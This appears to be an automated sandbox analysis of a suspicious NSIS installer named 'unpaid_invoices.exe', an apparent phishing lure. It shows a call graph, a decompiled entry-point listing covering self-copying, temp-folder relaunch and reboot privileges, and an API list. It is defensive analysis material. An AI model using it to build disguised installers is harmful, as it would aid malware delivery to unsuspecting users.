4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 405af7 4239->4243 4244 405964 4240->4244 
4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 401bf1 4309->4311 4312 401c16 GlobalAlloc 
4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 4362 402040 4361->4362 4363 4020cc 
4362->4363 4364 40205c GlobalAlloc 4362->4364 4364->4363 4365 402070 4364->4365 4366 406a3b 5 API calls 4365->4366 4367 402077 4366->4367 4368 406a3b 5 API calls 4367->4368 4369 402081 4368->4369 4369->4363 4373 4065b5 wsprintfW 4369->4373 4371 4020ba 4374 4065b5 wsprintfW 4371->4374 4373->4371 4374->4363 4375 40252a 4376 402de6 17 API calls 4375->4376 4377 402534 4376->4377 4378 402da6 17 API calls 4377->4378 4379 40253d 4378->4379 4380 402548 RegQueryValueExW 4379->4380 4383 40292e 4379->4383 4381 402568 4380->4381 4382 40256e RegCloseKey 4380->4382 4381->4382 4386 4065b5 wsprintfW 4381->4386 4382->4383 4386->4382 4387 4021aa 4388 402da6 17 API calls 4387->4388 4389 4021b1 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021bb 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4021c5 4392->4393 4394 402da6 17 API calls 4393->4394 4395 4021cf 4394->4395 4396 402da6 17 API calls 4395->4396 4397 4021d9 4396->4397 4398 402218 CoCreateInstance 4397->4398 4399 402da6 17 API calls 4397->4399 4402 402237 4398->4402 4399->4398 4400 401423 24 API calls 4401 4022f6 4400->4401 4402->4400 4402->4401 3699 403c2b 3700 403c46 3699->3700 3701 403c3c CloseHandle 3699->3701 3702 403c50 CloseHandle 3700->3702 3703 403c5a 3700->3703 3701->3700 3702->3703 3708 403c88 3703->3708 3706 405d7a 67 API calls 3707 403c6b 3706->3707 3709 403c96 3708->3709 3710 403c5f 3709->3710 3711 403c9b FreeLibrary GlobalFree 3709->3711 3710->3706 3711->3710 3711->3711 4403 401a30 4404 402da6 17 API calls 4403->4404 4405 401a39 ExpandEnvironmentStringsW 4404->4405 4406 401a4d 4405->4406 4408 401a60 4405->4408 4407 401a52 lstrcmpW 4406->4407 4406->4408 4407->4408 4414 4023b2 4415 4023c0 4414->4415 4416 4023ba 4414->4416 4418 4023ce 4415->4418 4419 402da6 17 API calls 4415->4419 4417 402da6 17 API calls 4416->4417 4417->4415 4420 4023dc 4418->4420 4422 402da6 17 API calls 4418->4422 4419->4418 4421 402da6 17 API calls 4420->4421 4423 4023e5 WritePrivateProfileStringW 4421->4423 4422->4420 4424 402434 
4425 402467 4424->4425 4426 40243c 4424->4426 4428 402da6 17 API calls 4425->4428 4427 402de6 17 API calls 4426->4427 4429 402443 4427->4429 4430 40246e 4428->4430 4432 40247b 4429->4432 4433 402da6 17 API calls 4429->4433 4435 402e64 4430->4435 4434 402454 RegDeleteValueW RegCloseKey 4433->4434 4434->4432 4436 402e78 4435->4436 4438 402e71 4435->4438 4436->4438 4439 402ea9 4436->4439 4438->4432 4440 4064db RegOpenKeyExW 4439->4440 4441 402ed7 4440->4441 4442 402f81 4441->4442 4443 402ee7 RegEnumValueW 4441->4443 4447 402f0a 4441->4447 4442->4438 4444 402f71 RegCloseKey 4443->4444 4443->4447 4444->4442 4445 402f46 RegEnumKeyW 4446 402f4f RegCloseKey 4445->4446 4445->4447 4448 406a3b 5 API calls 4446->4448 4447->4444 4447->4445 4447->4446 4449 402ea9 6 API calls 4447->4449 4450 402f5f 4448->4450 4449->4447 4450->4442 4451 402f63 RegDeleteKeyW 4450->4451 4451->4442 4452 401735 4453 402da6 17 API calls 4452->4453 4454 40173c SearchPathW 4453->4454 4455 401757 4454->4455 4456 405037 GetDlgItem GetDlgItem 4457 405089 7 API calls 4456->4457 4468 4052ae 4456->4468 4458 405130 DeleteObject 4457->4458 4459 405123 SendMessageW 4457->4459 4460 405139 4458->4460 4459->4458 4462 405170 4460->4462 4463 4066ab 17 API calls 4460->4463 4461 405390 4465 40543c 4461->4465 4475 4053e9 SendMessageW 4461->4475 4499 4052a1 4461->4499 4464 4045ca 18 API calls 4462->4464 4469 405152 SendMessageW SendMessageW 4463->4469 4470 405184 4464->4470 4466 405446 SendMessageW 4465->4466 4467 40544e 4465->4467 4466->4467 4477 405460 ImageList_Destroy 4467->4477 4478 405467 4467->4478 4489 405477 4467->4489 4468->4461 4473 404f85 5 API calls 4468->4473 4495 40531d 4468->4495 4469->4460 4474 4045ca 18 API calls 4470->4474 4471 405382 SendMessageW 4471->4461 4472 404631 8 API calls 4476 40563d 4472->4476 4473->4495 4486 405195 4474->4486 4480 4053fe SendMessageW 4475->4480 4475->4499 4477->4478 4481 405470 GlobalFree 4478->4481 4478->4489 4479 4055f1 4484 405603 ShowWindow GetDlgItem ShowWindow 
4479->4484 4479->4499 4483 405411 4480->4483 4481->4489 4482 405270 GetWindowLongW SetWindowLongW 4485 405289 4482->4485 4490 405422 SendMessageW 4483->4490 4484->4499 4487 4052a6 4485->4487 4488 40528e ShowWindow 4485->4488 4486->4482 4491 40526b 4486->4491 4494 4051e8 SendMessageW 4486->4494 4496 405226 SendMessageW 4486->4496 4497 40523a SendMessageW 4486->4497 4509 4045ff SendMessageW 4487->4509 4508 4045ff SendMessageW 4488->4508 4489->4479 4498 405005 4 API calls 4489->4498 4503 4054b2 4489->4503 4490->4465 4491->4482 4491->4485 4494->4486 4495->4461 4495->4471 4496->4486 4497->4486 4498->4503 4499->4472 4500 4055bc 4501 4055c7 InvalidateRect 4500->4501 4504 4055d3 4500->4504 4501->4504 4502 4054e0 SendMessageW 4507 4054f6 4502->4507 4503->4502 4503->4507 4504->4479 4510 404f40 4504->4510 4506 40556a SendMessageW SendMessageW 4506->4507 4507->4500 4507->4506 4508->4499 4509->4468 4513 404e77 4510->4513 4512 404f55 4512->4479 4514 404e90 4513->4514 4515 4066ab 17 API calls 4514->4515 4516 404ef4 4515->4516 4517 4066ab 17 API calls 4516->4517 4518 404eff 4517->4518 4519 4066ab 17 API calls 4518->4519 4520 404f15 lstrlenW wsprintfW SetDlgItemTextW 4519->4520 4520->4512 4521 401d38 4522 402d84 17 API calls 4521->4522 4523 401d3f 4522->4523 4524 402d84 17 API calls 4523->4524 4525 401d4b GetDlgItem 4524->4525 4526 402638 4525->4526 4527 4014b8 4528 4014be 4527->4528 4529 401389 2 API calls 4528->4529 4530 4014c6 4529->4530 4531 40473a lstrlenW 4532 404759 4531->4532 4533 40475b WideCharToMultiByte 4531->4533 4532->4533 4534 404abb 4535 404ae7 4534->4535 4536 404af8 4534->4536 4595 405cb2 GetDlgItemTextW 4535->4595 4538 404b04 GetDlgItem 4536->4538 4543 404b63 4536->4543 4541 404b18 4538->4541 4539 404c47 4544 404df6 4539->4544 4597 405cb2 GetDlgItemTextW 4539->4597 4540 404af2 4542 4068f5 5 API calls 4540->4542 4546 404b2c SetWindowTextW 4541->4546 4547 405fe8 4 API calls 4541->4547 4542->4536 4543->4539 4543->4544 4548 4066ab 17 API calls 4543->4548 4551 404631 8 
API calls 4544->4551 4550 4045ca 18 API calls 4546->4550 4552 404b22 4547->4552 4553 404bd7 SHBrowseForFolderW 4548->4553 4549 404c77 4554 406045 18 API calls 4549->4554 4555 404b48 4550->4555 4556 404e0a 4551->4556 4552->4546 4560 405f3d 3 API calls 4552->4560 4553->4539 4557 404bef CoTaskMemFree 4553->4557 4558 404c7d 4554->4558 4559 4045ca 18 API calls 4555->4559 4561 405f3d 3 API calls 4557->4561 4598 40666e lstrcpynW 4558->4598 4562 404b56 4559->4562 4560->4546 4563 404bfc 4561->4563 4596 4045ff SendMessageW 4562->4596 4566 404c33 SetDlgItemTextW 4563->4566 4571 4066ab 17 API calls 4563->4571 4566->4539 4567 404b5c 4569 406a3b 5 API calls 4567->4569 4568 404c94 4570 406a3b 5 API calls 4568->4570 4569->4543 4577 404c9b 4570->4577 4572 404c1b lstrcmpiW 4571->4572 4572->4566 4575 404c2c lstrcatW 4572->4575 4573 404cdc 4599 40666e lstrcpynW 4573->4599 4575->4566 4576 404ce3 4578 405fe8 4 API calls 4576->4578 4577->4573 4581 405f89 2 API calls 4577->4581 4583 404d34 4577->4583 4579 404ce9 GetDiskFreeSpaceW 4578->4579 4582 404d0d MulDiv 4579->4582 4579->4583 4581->4577 4582->4583 4584 404da5 4583->4584 4586 404f40 20 API calls 4583->4586 4585 404dc8 4584->4585 4587 40140b 2 API calls 4584->4587 4600 4045ec EnableWindow 4585->4600 4588 404d92 4586->4588 4587->4585 4590 404da7 SetDlgItemTextW 4588->4590 4591 404d97 4588->4591 4590->4584 4593 404e77 20 API calls 4591->4593 4592 404de4 4592->4544 4594 404a14 SendMessageW 4592->4594 4593->4584 4594->4544 4595->4540 4596->4567 4597->4549 4598->4568 4599->4576 4600->4592 4601 40263e 4602 402652 4601->4602 4603 40266d 4601->4603 4604 402d84 17 API calls 4602->4604 4605 402672 4603->4605 4606 40269d 4603->4606 4613 402659 4604->4613 4607 402da6 17 API calls 4605->4607 4608 402da6 17 API calls 4606->4608 4609 402679 4607->4609 4610 4026a4 lstrlenW 4608->4610 4618 406690 WideCharToMultiByte 4609->4618 4610->4613 4612 40268d lstrlenA 4612->4613 4614 4026e7 4613->4614 4616 40623f 5 API calls 4613->4616 4617 4026d1 4613->4617 
4615 406210 WriteFile 4615->4614 4616->4617 4617->4614 4617->4615 4618->4612

              Control-flow Graph

              • Executed
              • Not Executed
              C-Code - Quality: 78%
              			_entry_() {
              				WCHAR* _v8;
              				signed int _v12;
              				void* _v16;
              				signed int _v20;
              				int _v24;
              				int _v28;
              				struct _TOKEN_PRIVILEGES _v40;
              				signed char _v42;
              				int _v44;
              				signed int _v48;
              				intOrPtr _v278;
              				signed short _v310;
              				struct _OSVERSIONINFOW _v324;
              				struct _SHFILEINFOW _v1016;
              				intOrPtr* _t88;
              				WCHAR* _t92;
              				char* _t94;
              				void _t97;
              				void* _t116;
              				WCHAR* _t118;
              				signed int _t119;
              				intOrPtr* _t123;
              				void* _t137;
              				void* _t143;
              				void* _t148;
              				void* _t152;
              				void* _t157;
              				signed int _t167;
              				void* _t170;
              				void* _t175;
              				intOrPtr _t177;
              				intOrPtr _t178;
              				intOrPtr* _t179;
              				int _t188;
              				void* _t189;
              				void* _t198;
              				signed int _t204;
              				signed int _t209;
              				signed int _t214;
              				signed int _t216;
              				int* _t218;
              				signed int _t226;
              				signed int _t229;
              				CHAR* _t231;
              				char* _t232;
              				signed int _t233;
              				WCHAR* _t234;
              				void* _t250;
              
              				_t216 = 0x20;
              				_t188 = 0;
              				_v24 = 0;
              				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
              				_v20 = 0;
              				SetErrorMode(0x8001); // executed
              				_v324.szCSDVersion = 0;
              				_v48 = 0;
              				_v44 = 0;
              				_v324.dwOSVersionInfoSize = 0x11c;
              				if(GetVersionExW( &_v324) == 0) {
              					_v324.dwOSVersionInfoSize = 0x114;
              					GetVersionExW( &_v324);
              					asm("sbb eax, eax");
              					_v42 = 4;
              					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
              				}
              				if(_v324.dwMajorVersion < 0xa) {
              					_v310 = _v310 & 0x00000000;
              				}
              				 *0x7a8b58 = _v324.dwBuildNumber;
              				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
              				if( *0x7a8b5e != 0x600) {
              					_t179 = E00406A3B(_t188);
              					if(_t179 != _t188) {
              						 *_t179(0xc00);
              					}
              				}
              				_t231 = "UXTHEME";
              				do {
              					E004069CB(_t231); // executed
              					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
              				} while ( *_t231 != 0);
              				E00406A3B(0xb);
              				 *0x7a8aa4 = E00406A3B(9);
              				_t88 = E00406A3B(7);
              				if(_t88 != _t188) {
              					_t88 =  *_t88(0x1e);
              					if(_t88 != 0) {
              						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
              					}
              				}
              				__imp__#17();
              				__imp__OleInitialize(_t188); // executed
              				 *0x7a8b60 = _t88;
              				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
              				E0040666E(0x7a7aa0, L"NSIS Error");
              				_t92 = GetCommandLineW();
              				_t232 = L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ";
              				E0040666E(_t232, _t92);
              				_t94 = _t232;
              				_t233 = 0x22;
              				 *0x7a8aa0 = 0x400000;
              				_t250 = L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" " - _t233; // 0x22
              				if(_t250 == 0) {
              					_t216 = _t233;
              					_t94 =  &M007B3002;
              				}
              				_t198 = CharNextW(E00405F6A(_t94, _t216));
              				_v16 = _t198;
              				while(1) {
              					_t97 =  *_t198;
              					_t251 = _t97 - _t188;
              					if(_t97 == _t188) {
              						break;
              					}
              					_t209 = 0x20;
              					__eflags = _t97 - _t209;
              					if(_t97 != _t209) {
              						L17:
              						__eflags =  *_t198 - _t233;
              						_v12 = _t209;
              						if( *_t198 == _t233) {
              							_v12 = _t233;
              							_t198 = _t198 + 2;
              							__eflags = _t198;
              						}
              						__eflags =  *_t198 - 0x2f;
              						if( *_t198 != 0x2f) {
              							L32:
              							_t198 = E00405F6A(_t198, _v12);
              							__eflags =  *_t198 - _t233;
              							if(__eflags == 0) {
              								_t198 = _t198 + 2;
              								__eflags = _t198;
              							}
              							continue;
              						} else {
              							_t198 = _t198 + 2;
              							__eflags =  *_t198 - 0x53;
              							if( *_t198 != 0x53) {
              								L24:
              								asm("cdq");
              								asm("cdq");
              								_t214 = L"NCRC" & 0x0000ffff;
              								asm("cdq");
              								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
              								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
              								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
              									L29:
              									asm("cdq");
              									asm("cdq");
              									_t209 = L" /D=" & 0x0000ffff;
              									asm("cdq");
              									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
              									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
              									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
              										L31:
              										_t233 = 0x22;
              										goto L32;
              									}
              									__eflags =  *_t198 - _t229;
              									if( *_t198 == _t229) {
              										 *(_t198 - 4) = _t188;
              										__eflags = _t198;
              										E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
              										L37:
              										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
              										GetTempPathW(0x400, _t234);
              										_t116 = E00403615(_t198, _t251);
              										_t252 = _t116;
              										if(_t116 != 0) {
              											L40:
              											DeleteFileW(L"1033"); // executed
              											_t118 = E004030D0(_t254, _v20); // executed
              											_v8 = _t118;
              											if(_t118 != _t188) {
              												L68:
              												ExitProcess(); // executed
              												__imp__OleUninitialize(); // executed
              												if(_v8 == _t188) {
              													if( *0x7a8b34 == _t188) {
              														L77:
              														_t119 =  *0x7a8b4c;
              														if(_t119 != 0xffffffff) {
              															_v24 = _t119;
              														}
              														ExitProcess(_v24);
              													}
              													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
              														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
              														_v40.PrivilegeCount = 1;
              														_v28 = 2;
              														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
              													}
              													_t123 = E00406A3B(4);
              													if(_t123 == _t188) {
              														L75:
              														if(ExitWindowsEx(2, 0x80040002) != 0) {
              															goto L77;
              														}
              														goto L76;
              													} else {
              														_push(0x80040002);
              														_push(0x25);
              														_push(_t188);
              														_push(_t188);
              														_push(_t188);
              														if( *_t123() == 0) {
              															L76:
              															E0040140B(9);
              															goto L77;
              														}
              														goto L75;
              													}
              												}
              												E00405CCE(_v8, 0x200010);
              												ExitProcess(2);
              											}
              											if( *0x7a8abc == _t188) {
              												L51:
              												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
              												_v24 = E00403D1D(_t264);
              												goto L68;
              											}
              											_t218 = E00405F6A(L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ", _t188);
              											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ") {
              												L48:
              												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ";
              												_v8 = L"Error launching installer";
              												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ") {
              													_t189 = E00405C39(__eflags);
              													lstrcatW(_t234, L"~nsu");
              													__eflags = _t189;
              													if(_t189 != 0) {
              														lstrcatW(_t234, "A");
              													}
              													lstrcatW(_t234, L".tmp");
              													_t219 = L"C:\\Users\\jones\\Desktop";
              													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
              													__eflags = _t137;
              													if(_t137 == 0) {
              														L67:
              														_t188 = 0;
              														__eflags = 0;
              														goto L68;
              													} else {
              														__eflags = _t189;
              														_push(_t234);
              														if(_t189 == 0) {
              															E00405C1C();
              														} else {
              															E00405B9F();
              														}
              														SetCurrentDirectoryW(_t234);
              														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
              														if(__eflags == 0) {
              															E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
              														}
              														E0040666E(0x7a9000, _v16);
              														_t201 = "A" & 0x0000ffff;
              														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
              														__eflags = _t143;
              														_v12 = 0x1a;
              														 *0x7a9800 = _t143;
              														do {
              															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
              															DeleteFileW(0x79f748);
              															__eflags = _v8;
              															if(_v8 != 0) {
              																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe", 0x79f748, 1);
              																__eflags = _t148;
              																if(_t148 != 0) {
              																	E0040642E(_t201, 0x79f748, 0);
              																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
              																	_t152 = E00405C51(0x79f748);
              																	__eflags = _t152;
              																	if(_t152 != 0) {
              																		CloseHandle(_t152);
              																		_v8 = 0;
              																	}
              																}
              															}
              															 *0x7a9800 =  *0x7a9800 + 1;
              															_t61 =  &_v12;
              															 *_t61 = _v12 - 1;
              															__eflags =  *_t61;
              														} while ( *_t61 != 0);
              														E0040642E(_t201, _t234, 0);
              														goto L67;
              													}
              												}
              												 *_t218 = _t188;
              												_t221 =  &(_t218[2]);
              												_t157 = E00406045(_t263,  &(_t218[2]));
              												_t264 = _t157;
              												if(_t157 == 0) {
              													goto L68;
              												}
              												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
              												E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
              												_v8 = _t188;
              												goto L51;
              											}
              											asm("cdq");
              											asm("cdq");
              											asm("cdq");
              											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
              											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
              											while( *_t218 != _t204 || _t218[1] != _t167) {
              												_t218 = _t218;
              												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\unpaid_invoices.exe\" ") {
              													continue;
              												}
              												break;
              											}
              											_t188 = 0;
              											goto L48;
              										}
              										GetWindowsDirectoryW(_t234, 0x3fb);
              										lstrcatW(_t234, L"\\Temp");
              										_t170 = E00403615(_t198, _t252);
              										_t253 = _t170;
              										if(_t170 != 0) {
              											goto L40;
              										}
              										GetTempPathW(0x3fc, _t234);
              										lstrcatW(_t234, L"Low");
              										SetEnvironmentVariableW(L"TEMP", _t234);
              										SetEnvironmentVariableW(L"TMP", _t234);
              										_t175 = E00403615(_t198, _t253);
              										_t254 = _t175;
              										if(_t175 == 0) {
              											goto L68;
              										}
              										goto L40;
              									}
              									goto L31;
              								}
              								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
              								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
              									goto L29;
              								}
              								_t177 =  *((intOrPtr*)(_t198 + 8));
              								__eflags = _t177 - 0x20;
              								if(_t177 == 0x20) {
              									L28:
              									_t36 =  &_v20;
              									 *_t36 = _v20 | 0x00000004;
              									__eflags =  *_t36;
              									goto L29;
              								}
              								__eflags = _t177 - _t188;
              								if(_t177 != _t188) {
              									goto L29;
              								}
              								goto L28;
              							}
              							_t178 =  *((intOrPtr*)(_t198 + 2));
              							__eflags = _t178 - _t209;
              							if(_t178 == _t209) {
              								L23:
              								 *0x7a8b40 = 1;
              								goto L24;
              							}
              							__eflags = _t178 - _t188;
              							if(_t178 != _t188) {
              								goto L24;
              							}
              							goto L23;
              						}
              					} else {
              						goto L16;
              					}
              					do {
              						L16:
              						_t198 = _t198 + 2;
              						__eflags =  *_t198 - _t209;
              					} while ( *_t198 == _t209);
              					goto L17;
              				}
              				goto L37;
              			}

              APIs
              • SetErrorMode.KERNELBASE(00008001), ref: 00403669
              • GetVersionExW.KERNEL32(?), ref: 00403692
              • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
              • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
              • OleInitialize.OLE32(00000000), ref: 00403783
              • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
              • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\unpaid_invoices.exe" ,00000020,"C:\Users\user\Desktop\unpaid_invoices.exe" ,00000000), ref: 004037EF
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
              • DeleteFileW.KERNELBASE(1033), ref: 00403988
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
